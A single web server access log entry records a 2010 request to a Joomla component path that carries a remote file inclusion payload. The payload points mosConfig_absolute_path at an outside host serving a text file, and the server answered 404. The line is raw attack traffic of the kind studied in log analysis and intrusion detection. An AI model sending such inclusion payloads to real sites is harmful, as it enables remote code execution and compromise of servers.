61.47.7.71 - - [04/Jan/2010:02:46:30 -0800] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
